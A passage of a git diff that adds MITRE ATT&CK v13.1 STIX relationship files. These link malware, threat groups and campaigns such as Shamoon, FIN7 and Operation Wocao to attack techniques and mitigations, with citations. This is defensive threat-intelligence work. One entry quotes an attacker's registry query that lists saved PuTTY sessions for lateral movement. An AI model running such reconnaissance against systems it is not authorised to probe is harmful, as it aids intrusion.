"relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", + "source_name": "Palo Alto Shamoon Nov 2016" + }, + { + "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "source_name": "Unit 42 Shamoon3 2018" + } + ], + "modified": "2020-05-29T18:11:24.446Z", + "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)", + "relationship_type": "uses", + "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3", + "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002c9202-d7a0-4181-b912-42f7d6d38339.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002c9202-d7a0-4181-b912-42f7d6d38339.json new file mode 100644 index 0000000000000000000000000000000000000000..c6ec9aef967da85281bd4af4fc08ce97c44993e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002c9202-d7a0-4181-b912-42f7d6d38339.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--0f9c9ff5-1e5e-4778-bb28-f313e8bcf849", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--002c9202-d7a0-4181-b912-42f7d6d38339", + "type": "relationship", + "created": "2019-01-29T21:47:53.704Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos Micropsia June 2017", + "url": "https://blog.talosintelligence.com/2017/06/palestine-delphi.html", + "description": "Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018." + }, + { + "source_name": "Radware Micropsia July 2018", + "url": "https://blog.radware.com/security/2018/07/micropsia-malware/", + "description": "Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018." + } + ], + "modified": "2019-04-17T22:05:05.904Z", + "description": "[Micropsia](https://attack.mitre.org/software/S0339) gathers the hostname and OS version from the victim\u2019s machine.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)", + "relationship_type": "uses", + "source_ref": "malware--8c050cea-86e1-4b63-bf21-7af4fa483349", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0032f447-1ab7-427d-b7ae-baa436dc2411.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0032f447-1ab7-427d-b7ae-baa436dc2411.json new file mode 100644 index 0000000000000000000000000000000000000000..955ba13cc9fc42e5cec025c66b396c16cdab6fcc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0032f447-1ab7-427d-b7ae-baa436dc2411.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--95004796-3cec-4d58-acf0-1257adb435c9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0032f447-1ab7-427d-b7ae-baa436dc2411", + "created": "2022-09-27T17:52:38.906Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FoxIT Wocao December 2019", + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.", + "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-07T20:41:51.144Z", + "description": "During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors executed `/c cd /d c:\\windows\\temp\\ & reg query HKEY_CURRENT_USER\\Software\\\\PuTTY\\Sessions\\` to detect recent PuTTY sessions, likely to further lateral movement.(Citation: FoxIT Wocao December 2019)", + "relationship_type": "uses", + "source_ref": "campaign--b03d5112-e23a-4ac8-add0-be7502d24eff", + "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--003f23dd-24c7-4b3b-b703-0bf081d638f4.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--003f23dd-24c7-4b3b-b703-0bf081d638f4.json new file mode 100644 index 0000000000000000000000000000000000000000..6e0c92ed759b404d2650ba002852f6f04acabacb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--003f23dd-24c7-4b3b-b703-0bf081d638f4.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--5e00f6e7-cf1e-480f-b786-53d3297d679b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--003f23dd-24c7-4b3b-b703-0bf081d638f4", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", + "source_name": "Symantec Elderwood Sept 2012" + } + ], + "modified": "2021-01-06T19:32:29.096Z", + "description": "(Citation: Symantec Elderwood Sept 2012)", + "relationship_type": "uses", + "source_ref": "intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484", + "target_ref": "malware--b42378e0-f147-496f-992a-26a49705395b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040312a-e85d-4066-8203-2e66f8aa5288.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040312a-e85d-4066-8203-2e66f8aa5288.json new file mode 100644 index 0000000000000000000000000000000000000000..63d48424586cd3efeab45ff2cd9867aa86a2b0dc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040312a-e85d-4066-8203-2e66f8aa5288.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--8c10a87e-9afb-4576-913a-367f460352a2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0040312a-e85d-4066-8203-2e66f8aa5288", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Unit 42 DarkHydrus July 2018", + "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + }, + { + "source_name": "Unit42 DarkHydrus Jan 2019", + "url": "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", + "description": "Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019." + } + ], + "modified": "2019-04-24T23:55:43.191Z", + "description": "[RogueRobin](https://attack.mitre.org/software/S0270) establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)", + "relationship_type": "uses", + "source_ref": "malware--8ec6e3b4-b06d-4805-b6aa-af916acc2122", + "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040fdbd-ec7e-49b3-b715-c8c91e08666b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040fdbd-ec7e-49b3-b715-c8c91e08666b.json new file mode 100644 index 0000000000000000000000000000000000000000..ba727d126041b854de0cd27fbbb4281913fd63c8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0040fdbd-ec7e-49b3-b715-c8c91e08666b.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--9ca03d97-21bb-443e-8d46-283095dc6701", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0040fdbd-ec7e-49b3-b715-c8c91e08666b", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Emissary Trojan Feb 2016", + "description": "Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/" + } + ], + "modified": "2021-08-27T14:42:00.464Z", + "description": "Variants of [Emissary](https://attack.mitre.org/software/S0082) have added Run Registry keys to establish persistence.(Citation: Emissary Trojan Feb 2016)", + "relationship_type": "uses", + "source_ref": "malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00490a17-1032-461b-8085-500d56bb80f5.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00490a17-1032-461b-8085-500d56bb80f5.json new file mode 100644 index 0000000000000000000000000000000000000000..9143c925a3137daed528c02bb2a278892aa9d0e3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00490a17-1032-461b-8085-500d56bb80f5.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--66e8ab35-06c5-4e27-a1b6-a3affb5fc4cb", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00490a17-1032-461b-8085-500d56bb80f5", + "type": "relationship", + "created": "2019-06-05T17:31:22.436Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Ursnif Mar 2015", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992", + "description": "Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019." + } + ], + "modified": "2019-06-24T16:46:20.632Z", + "description": "[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running services.(Citation: TrendMicro Ursnif Mar 2015)", + "relationship_type": "uses", + "source_ref": "malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407", + "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004cc00b-0a84-4783-aa4e-16b47f7465b2.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004cc00b-0a84-4783-aa4e-16b47f7465b2.json new file mode 100644 index 0000000000000000000000000000000000000000..8cb1c0e9eaad1c424b5c4f3bd987dcccf144805f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004cc00b-0a84-4783-aa4e-16b47f7465b2.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--d4cf843e-5ae5-4ad3-aba3-84fc7876c503", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--004cc00b-0a84-4783-aa4e-16b47f7465b2", + "created": "2022-09-30T16:05:59.615Z", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA AA22-055A MuddyWater February 2022", + "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T16:05:59.615Z", + "description": "[Mori](https://attack.mitre.org/software/S1047) can communicate using HTTP over IPv4 or IPv6 depending on a flag set.(Citation: DHS CISA AA22-055A MuddyWater February 2022)", + "relationship_type": "uses", + "source_ref": "malware--7e100ca4-e639-48d9-9a9d-8ad84aa7b448", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004fbe29-2537-418e-9951-a2750a5fa901.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004fbe29-2537-418e-9951-a2750a5fa901.json new file mode 100644 index 0000000000000000000000000000000000000000..ced4d9ca3d390c14e71749276655aea5507a1988 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--004fbe29-2537-418e-9951-a2750a5fa901.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ddb8fa70-f6ec-4cc1-acab-8f12aca1bb17", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--004fbe29-2537-418e-9951-a2750a5fa901", + "type": "relationship", + "created": "2020-10-20T03:11:14.529Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-04-15T03:19:01.263Z", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0051db4d-9eb9-4b22-93a5-b6593176da75.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0051db4d-9eb9-4b22-93a5-b6593176da75.json new file mode 100644 index 0000000000000000000000000000000000000000..bccdc828cf93e4ecdf39924ea8658cb62f76ed82 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0051db4d-9eb9-4b22-93a5-b6593176da75.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--15fff596-7d71-4524-946f-ac1576cef1cb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0051db4d-9eb9-4b22-93a5-b6593176da75", + "created": "2023-01-03T20:25:02.218Z", + "revoked": false, + "external_references": [ + { + "source_name": "Mandiant APT41", + "description": "Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.", + "url": "https://www.mandiant.com/resources/apt41-us-state-governments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-01-03T20:25:02.218Z", + "description": "[DEADEYE](https://attack.mitre.org/software/S1052) has encrypted its payload.(Citation: Mandiant APT41)", + "relationship_type": "uses", + "source_ref": "malware--c46eb8e6-bf29-4696-8008-3ddb0b4ca470", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00561c3c-345e-4578-95c3-b7e0a95db7b1.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00561c3c-345e-4578-95c3-b7e0a95db7b1.json new file mode 100644 index 0000000000000000000000000000000000000000..33c019d529dba28413e5a312189c94f6e2f8ae9f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00561c3c-345e-4578-95c3-b7e0a95db7b1.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b55515cc-0eaf-41f0-8b04-c0cea7766046", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00561c3c-345e-4578-95c3-b7e0a95db7b1", + "type": "relationship", + "created": "2021-09-22T14:33:04.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021." + } + ], + "modified": "2021-09-22T14:33:04.183Z", + "description": "[FIN7](https://attack.mitre.org/groups/G0046) has used malicious links to lure victims into downloading malware.(Citation: CrowdStrike Carbon Spider August 2021)", + "relationship_type": "uses", + "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b46de-6241-413e-ba13-e0c2cc8efa77.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b46de-6241-413e-ba13-e0c2cc8efa77.json new file mode 100644 index 0000000000000000000000000000000000000000..167da845072eb9224b971fc0437ed37e13eb5bf7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b46de-6241-413e-ba13-e0c2cc8efa77.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--c3a1612e-5f23-4ee0-a150-4038eba9f7ee", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--005b46de-6241-413e-ba13-e0c2cc8efa77", + "created": "2021-03-04T22:46:49.079Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T19:41:12.256Z", + "description": "Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing).\n\nFurthermore, policies may enforce / install browser extensions that protect against IDN and homograph attacks.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b5dbb4c5-b0b1-40b1-80b6-e9e84ab90067", + "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b6fd1-be80-424b-b6df-2ff88d390b1b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b6fd1-be80-424b-b6df-2ff88d390b1b.json new file mode 100644 index 0000000000000000000000000000000000000000..3778ac101e96f224cd06943f3ef58f4443640c28 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005b6fd1-be80-424b-b6df-2ff88d390b1b.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--52486a13-8c1a-414e-972f-eaf6ea84be77", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--005b6fd1-be80-424b-b6df-2ff88d390b1b", + "type": "relationship", + "created": "2021-03-12T16:30:52.475Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "MSTIC NOBELIUM Mar 2021", + "url": "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "description": "Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM\u2019s layered persistence. Retrieved March 8, 2021." + } + ], + "modified": "2021-03-12T16:30:52.475Z", + "description": "[GoldMax](https://attack.mitre.org/software/S0588) has used scheduled tasks to maintain persistence.(Citation: MSTIC NOBELIUM Mar 2021)", + "relationship_type": "uses", + "source_ref": "malware--5c747acd-47f0-4c5a-b9e5-213541fc01e0", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005cbf7d-9d0b-443b-91db-7b148a1eb55b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005cbf7d-9d0b-443b-91db-7b148a1eb55b.json new file mode 100644 index 0000000000000000000000000000000000000000..54529ca19e04a954dafe0b53ccecac7ff9ff006c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--005cbf7d-9d0b-443b-91db-7b148a1eb55b.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--e895de13-a7bc-4601-a9c9-9b968be7b127", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--005cbf7d-9d0b-443b-91db-7b148a1eb55b", + "type": "relationship", + "created": "2019-06-05T14:33:01.097Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Fidelis njRAT June 2013", + "url": "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf", + "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019." + } + ], + "modified": "2019-06-24T18:57:11.402Z", + "description": "[njRAT](https://attack.mitre.org/software/S0385) enumerates the victim operating system and computer name during the initial infection.(Citation: Fidelis njRAT June 2013)", + "relationship_type": "uses", + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0061f7aa-fe4e-41e5-8ebf-e9f526bda08f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0061f7aa-fe4e-41e5-8ebf-e9f526bda08f.json new file mode 100644 index 0000000000000000000000000000000000000000..62d2326480c09fc7ca4a27335bfc80bfeb267b09 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0061f7aa-fe4e-41e5-8ebf-e9f526bda08f.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--906eba88-07d0-4f6c-8d91-e7bb62b3318c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0061f7aa-fe4e-41e5-8ebf-e9f526bda08f", + "type": "relationship", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ClearSky Wilted Tulip July 2017", + "description": "ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + } + ], + "modified": "2020-03-19T22:00:22.401Z", + "description": "[TDTESS](https://attack.mitre.org/software/S0164) creates then deletes log files during installation of itself as a service.(Citation: ClearSky Wilted Tulip July 2017)", + "relationship_type": "uses", + "source_ref": "malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0068ee65-0945-4f69-ba81-163ffbc05e53.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0068ee65-0945-4f69-ba81-163ffbc05e53.json new file mode 100644 index 0000000000000000000000000000000000000000..b00c43ae5b49a45c4e8f07e6a791f1c1405e9b49 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0068ee65-0945-4f69-ba81-163ffbc05e53.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--8091aa72-2110-40fb-a234-44add1800412", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0068ee65-0945-4f69-ba81-163ffbc05e53", + "type": "relationship", + "created": "2019-05-24T17:02:44.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lab52 WIRTE Apr 2019", + "url": "https://lab52.io/blog/wirte-group-attacking-the-middle-east/", + "description": "S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019." + } + ], + "modified": "2019-06-20T15:30:38.635Z", + "description": "[WIRTE](https://attack.mitre.org/groups/G0090) has used PowerShell for script execution.(Citation: Lab52 WIRTE Apr 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": 